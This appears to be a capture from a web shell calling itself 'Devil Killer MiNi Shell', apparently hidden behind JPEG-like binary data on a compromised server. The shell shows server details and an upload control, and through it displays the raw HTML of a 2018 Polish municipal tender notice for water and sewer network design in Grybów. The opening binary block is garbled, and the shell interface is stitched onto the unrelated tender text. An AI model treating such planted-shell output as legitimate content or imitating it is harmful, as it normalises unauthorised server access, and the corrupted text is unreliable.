JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20180524/563530-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 563530-N-2018 z dnia 2018-05-24 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Burmistrz Miasta Grybów</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Opracowanie dokumentacji projektowo - kosztorysowej budowy odcinków sieci wod. - kan. na terenie Miasta Grybów.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Burmistrz Miasta Grybów</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">52779900000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Rynek</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">12</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">33330 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Grybów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">małopolskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">184 450 140</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">umgrybow@pro.onet.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">184 450 202</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.grybow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.grybow.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.grybow.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Opracowanie dokumentacji projektowo - kosztorysowej budowy odcinków sieci wod. - kan. na terenie Miasta Grybów.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">BGiOŚ.271.31.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu"> 3.1. Przedmiotem zamówienia jest: 3.1.1. Część I: Opracowanie dokumentacji projektowo-kosztorysowej budowy kanalizacji sanitarnej i sieci wodociągowej wraz z przyłączami na os. Biała Wyżna do granicy z m. Kąclowa. 3.1.2. Część II: Opracowanie dokumentacji projektowo-kosztorysowej budowy odcinków sieci wod. - kan. obejmującej zadania pn.: 3.1.2.1. projekt odcinka sieci wodociągowej i kanalizacyjnej w ul. Kościuszki w Grybowie, 3.1.2.2. projekt odcinka sieci kanalizacji sanitarnej na osiedlu Biała Wyżna, 3.1.2.3. projekt odcinka kanalizacji sanitarnej w obrębie rynku w Grybowie, 3.1.2.4. projekt odcinka sieci wodociągowej na ul. Na Stoku, 3.1.2.5. projekt spinki wodociągu w ul. Grunwaldzkiej w Grybowie, 3.1.2.6. projekt zbiornika zapasowo-wyrównawczego Kamienna Góra. 3.1.2.7. projekt odcinka sieci kanalizacyjnej dla mieszkańców ul. Czerwona Góra. 3.1.3. Zamawiający informuje, iż nazwy zadań dla cz. II są nazwami roboczymi i będzie możliwość ich modyfikacji w trakcie realizacji zadań projektowych. 3.1.4. Dokumentacja powinna uwzględniać opracowanie pn.: ,,Analiza funkcjonowania oraz określenie zakresu, warunków i wymagań technicznych w celu poprawy sposobu działania systemu wodociągowo-kanalizacyjnego na terenie miasta Grybowa. Część I - system wodociągowy oraz część II - System kanalizacyjny. 3.1.5. W zakres zamówienia części I wchodzi: 3.1.5.1. Opracowanie mapy sytuacyjno-wysokościowej do celów projektowych w skali 1:500. 3.1.5.2. Sporządzenie wykazu działek ewidencyjnych, przez które będzie przebiegała kanalizacja sanitarna i sieć wodociągowa oraz wykazu przyłączy kanalizacyjnych i wodociągowych. 3.1.5.3. Uzyskanie wszystkich niezbędnych uzgodnień i opinii, w tym zgody na wejście w teren przy budowie sieci kanalizacyjnej i wodociągowej - zgodnie z wykazem działek, 3.1.5.4. Opracowanie ocen geologiczno-inżynierskich podłoża lub opinii geologicznych zgodnie z Miejscowym Planem Zagospodarowania Przestrzennego Miasta Grybowa. 3.1.5.5. Opracowanie projektu budowlanego oraz wykonawczego likwidacji oczyszczalni ścieków Nebraska na osiedlu Biała Wyżna i wpięcia mieszkańców do nowoprojektowanej sieci kanalizacyjnej. 3.1.5.6. Opracowanie projektów budowlanych oraz wykonawczych na zadanie pn.: ,,Budowa kanalizacji sanitarnej i sieci wodociągowej z przyłączami na os. Biała Wyżna do granicy z m. Kąclowa" a) Przybliżona długość sieci wodociągowej (bez przyłączy) - około 4 200mb b) Przybliżona długość kanalizacji sanitarnej (bez przyłączy) - około 3 300mb c) Przybliżona ilość przyłączy wodociągowych - około 90 szt. d) Przybliżona ilość przyłączy kanalizacyjnych - około 90 szt. 3.1.5.7. Zgodnie z załączoną mapą kanalizacji sanitarnej - Model matematyczny - rysunek W.07. Plan sieci kanalizacyjnej do zaprojektowania jest kanalizacja sanitarna wraz z przyłączami na terenie zlewni F32, F30 i F31 oraz sieć wodociągowa na tym terenie wraz z przyłączami. 3.1.5.8. Odbiorcą ścieków z projektowanego kolektora sanitarnego będzie oczyszczalnia ścieków ,,Równie" w Białej Niżnej. 3.1.5.9. Uwaga! Projektant w ramach niniejszego zadania przy ustaleniu średnic sieci wod. - kan, powinien również uwzględnić możliwość ewentualnego przyszłego włączenia do sieci mieszkańców z osiedla Biała Wyżna - zlewnia F23 oraz F24 (Model matematyczny - rysunek W.07. Plan sieci kanalizacyjnej). Obecnie Zamawiający dysponuje projektem gdzie planuje się włączenie mieszkańców tego rejonu do oczyszczalni ścieków Przedmieście (kanalizacja tłoczna z przepompowniami ścieków). Ze względu na ukształtowanie terenu Zamawiający rozważa możliwość zmiany projektowej i włączenie tych mieszkańców grawitacyjnie do nowoprojektowanej sieci kierującej ścieki do oczyszczalni Równie (w roku 2018 planowana rozbudowa o drugi reaktor i zwiększenie przepustowości QŚRD.= 600m3/d. Dotyczy to również sieci wodociągowej. 3.1.5.10. Opracowanie raportu wpływu na środowisko zgodnie z wymogami ustawowymi. 3.1.5.11. Wykonanie innych opracowań projektowych, w przypadku takiej konieczności, jak: operaty wodno-prawne, projekty przepompowni ścieków i wody, projekty przyłączy energetycznych, uzyskanie warunków przyłączenia zasilanie energetycznego, projekty odbudowy dróg, potoków, przełożenia w razie potrzeby sieci energetycznych, gazowych wod-kan itp. 3.1.5.12. Sporządzenie Informacji dotyczącej Bezpieczeństwa i Ochrony Zdrowia. 3.1.5.13. Uzyskanie w imieniu Zamawiającego prawomocnego pozwolenia na budowę. 3.1.5.14. Opracowanie przedmiarów robót z podstawą wyceny i kosztorysów inwestorskich w zakresie i formie określonej w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym. 3.1.5.15. Opracowanie specyfikacji technicznych wykonania i odbioru robót w zakresie i formie wymaganej w Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego. 3.1.5.16. Wykonawca jest zobowiązany do przygotowania dla Zamawiającego wszelkich niezbędnych odpowiedzi na pytania wykonawców w ramach przetargu publicznego na wykonawstwo robót budowlanych zamawianych dotyczących Dokumentacji opracowanej przez Wykonawcę. 3.1.5.17. Pełnienie nadzoru autorskiego wielobranżowego nad inwestycją wykonywaną w oparciu o dokumentację wymienioną powyżej. 3.1.5.18. Wykaz dokumentacji technicznej do odbioru dla części I: a) Mapy sytuacyjno-wysokościowe do celów projektowych w skali 1:500, które należy wykonać w formie papierowej (2 egz.) oraz w formie elektronicznej na płycie CD lub DVD. b) Projekty budowlane i projekty wykonawcze muszą spełniać wszelkie wymogi Prawa Budowlanego i przepisów z nim związanych oraz zawierać uzgodnienia i pozwolenia instytucji, właścicieli działek, przez które przebiegać będzie sieć kanalizacyjna i wodociągowa niezbędne do uzyskania pozwolenia na budowę. c) Pozwolenie na budowę d) Wszelkie inne pozwolenia i zgody niezbędne do realizacji zadania. e) Kosztorysy inwestorskie i przedmiary robót należy sporządzić: ? osobno dla sieci ? osobno dla przyłączy ? osobno dla urządzeń sieciowych i zasilania energetycznego 3.1.5.19. W przedmiarach robót oraz kosztorysach należy wyspecyfikować szczegółowo odcinki sieci oraz poszczególne przyłącza. 3.1.5.20. Należy sporządzić dokumentację w następującej ilości egzemplarzy: a) Projekty budowlane - w 5 egzemplarzach b) Projekty wykonawcze - w 5 egzemplarzach c) Pozostałe opracowania - w 3 egzemplarzach d) Całość dokumentacji należy również opracować w formie elektronicznej na płytach CD-w 2 egz. e) Wykonawca zobowiązany będzie ponadto przekazać całość dokumentacji w wersji elektronicznej plikach PDF i JPG oraz w formatach, w których zostały utworzone (np. Word, norma, autocad). 3.1.6. W zakres zamówienia część II wchodzi: 3.1.6.1. Opracowanie mapy sytuacyjno-wysokościowej do celów projektowych w skali 1:500. 3.1.6.2. Sporządzenie wykazu działek ewidencyjnych, przez które będzie przebiegała kanalizacja sanitarna i sieć wodociągowa oraz wykazu przyłączy kanalizacyjnych i wodociągowych. 3.1.6.3. Uzyskanie wszystkich niezbędnych uzgodnień i opinii, w tym zgody na wejście w teren przy budowie sieci kanalizacyjnej i wodociągowej, 3.1.6.4. Opracowanie ocen geologiczno-inżynierskich podłoża lub opinii geologicznych zgodnie z Miejscowym Planem Zagospodarowania Przestrzennego Miasta Grybowa. 3.1.6.5. Opracowanie projektów budowlanych oraz wykonawczych części II obejmujących zadania pn.: a) Zadanie 1: projekt odcinka sieci wodociągowej i kanalizacyjnej w ul. Kościuszki w Grybowie - miejsce włączenia na załączonej dokumentacji graficznej. Odcinki sieci wodociągowej i kanalizacyjnej należy poprowadzić o ile to tylko możliwe po działkach będących własnością miasta o nr ewid. 16, 17 i 21 obr. 2 (optymalnie w poboczach i terenach zielonych) oraz przez tereny kolejowe tj. działkę 42/12 (tylko w koniecznym do ciągłości sieci zakresie). Zamawiający otrzymał wstępną zgodę na umieszczenie sieci na terenie kolejowym od PKP Polskie Linie Kolejowe S.A. Zakład Linii Kolejowych, Dział Automatyki, Telekomunikacji i Inwestycji w Nowym Sączu (pismo znak IZDK-505/311/2016 z dnia 31.01.2017r.). Przebieg odcinka sieci wodociągowej oraz kanalizacyjnej uzgodnić z Zamawiającym. Projekt powinien zawierać odcinki sieci wodociągowej i kanalizacyjnej wraz z przyłączami do budynków Kościuszki 31 i Kościuszki 33. b) Zadanie 2: projekt odcinka sieci kanalizacji sanitarnej na osiedlu Biała Wyżna. W związku z planowanym remontem odcinka drogi gminnej K 290820 położonej na działce nr 771 obr. 4 m. Grybowa konieczne jest zaprojektowanie odcinka kanalizacji sanitarnej wraz z przyłączami do istniejących i przewidywanych do budowy budynków na tym terenie. Miejsce włączenia oraz obszar do podpięcia do sieci kanalizacyjnej wskazano na załączniku graficznym. Obszar do podpięcia został zaznaczony na czerwono, ponadto Zamawiający wymaga włączenia do sieci kanalizacyjnej budynków położonych na działce nr 812 i 818 obr. 4 miasta Grybowa oraz ewentualnie działek gdzie planowana jest budowa domów. Przebieg sieci kanalizacyjnej uzgodnić z Zamawiającym. c) Zadanie 3: projekt odcinka kanalizacji sanitarnej w obrębie rynku w Grybowie - Zamawiający planuje doprojektowanie odcinka sieci kanalizacji sanitarnej (zamiennie do istniejącego projektu z przepompownią ścieków PpC1). Zamawiający posiada zgody właścicieli działek 455 obr. 1 oraz 727 obr. 1 na lokalizację odcinka kanalizacji sanitarnej po ich terenie. Do kanalizacji należy ,,podpiąć" mieszkańców budynków: Rynek 24 i 25, z ul. Kazimierza Wielkiego 2 oraz z ul. Pocztowej 2. d) Zadanie 4: projekt odcinka sieci wodociągowej na ul. Na Stoku - Zamawiający planuje doprojektowanie odcinka sieci wodociągowej - planowane miejsce włączenia do sieci wodociągowej w drodze ul. Na Stoku dz. nr 252 obr. 1 przy budynku nr 30. Planuje się zaprojektowanie odcinka sieci wodociągowej wraz z przyłączami do bud. 34 i 38 oraz 49 oraz działki 270, ewentualnie w razie potrzeby (planowana przez mieszkańców budowa domów) do działek sąsiednich. Należy dodatkowo zaprojektować hydranty na sieci. e) Zadanie 5: projekt spinki wodociągu w okolicy ul. Grunwaldzkiej w Grybowie stanowiący połączenie pomiędzy SUW ,,Równie" oraz ,,Park". Poglądowy przebieg połączeń (2 szt.) pokazano na Rys. 6.1. opracowania pn.: ,,Analiza funkcjonowania oraz określenie zakresu, warunków i wymagań technicznych w celu poprawy sposobu działania systemu wodociągowo-kanalizacyjnego na terenie miasta Grybowa" cz. I system wodociągowy - str. 17. f) Zadanie 6: projekt zbiornika zapasowo-wyrównawczego Kamienna Góra - budowa dwukomorowego zbiornika zapasowo-wyrównawczego posadowionego na rzędnej pozwalającej na uzyskanie ciśnienia ok. 2,0 barów na przyłączu najwyżej położonego budynku, jak również będącego w stanie objąć swym oddziaływaniem strefy ,,Turystyczna II" i ,,Turystyczna I". Zakres projektu obejmuje zaprojektowanie odcinka sieci wodociągowej od istniejącego odcinka sieci wodociągowej do zbiornika zapasowo-wyrównawczego. (ok. 428m sieci wodociągowej do zaprojektowania oraz 135m projekt zamienny w zakresie zmiany średnicy już zaprojektowanego wodociągu z DN 90 na DN110). g) Zadanie 7: projekt odcinka sieci kanalizacyjnej dla mieszkańców ul. Czerwona Góra - w celu likwidacji przepompowni PsH1, PpH4, PpH3 oraz PsK1 zamawiający planuje wykonanie grawitacyjnego odcinka kanalizacji sanitarnej od studzienki StH /36 do StH/22 równolegle do wcześniej zaprojektowanego odcinka od studzienki StH/35 do StH/22. Projektowany odcinek powinien uwzględnić przejście przez potok, odprowadzenie ścieków od mieszkańców ul. Turystycznej, podłączenie istniejących oraz przewidzianych do budowy budynków na 